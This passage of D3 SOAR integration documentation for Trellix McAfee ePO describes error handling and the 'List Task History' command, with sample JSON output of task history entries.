  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
No Sample Data

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List Table failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List Table failed.

Status Code: 401.

Message: Unauthorized.

List Task History

Retrieves a list of all task histories.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:01:41-08:00",
        "endDate": "2019-12-09T18:01:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "jhou Sync Status",
        "startDate": "2019-12-09T18:05:36-08:00",
        "endDate": "2019-12-09T18:06:02-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "accountSyncStatusTaskSource",
        "duration": "Less than a minute"
    },
    {
        "id": "966977",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:06:42-08:00",
        "endDate": "2019-12-09T18:06:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:01:41-08:00",
        "endDate": "2019-12-09T18:01:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:03:42-08:00",
        "endDate": "2019-12-09T18:03:42-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "jhou Sync Status",
        "startDate": "2019-12-09T18:05:36-08:00",
        "endDate": "2019-12-09T18:06:02-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "accountSyncStatusTaskSource",
        "duration": "Less than a minute"
    },
    {
        "id": "966977",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:06:42-08:00",
        "endDate": "2019-12-09T18:06:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "id": "*****",
        "name": "Threat Detected",
        "startDate": "2019-12-09T18:08:42-08:00",
        "endDate": "2019-12-09T18:08:43-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"id\\\": \\\"*****\\\",\\r\\n        \\\"name\\\": \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-08T17:00:21-08:0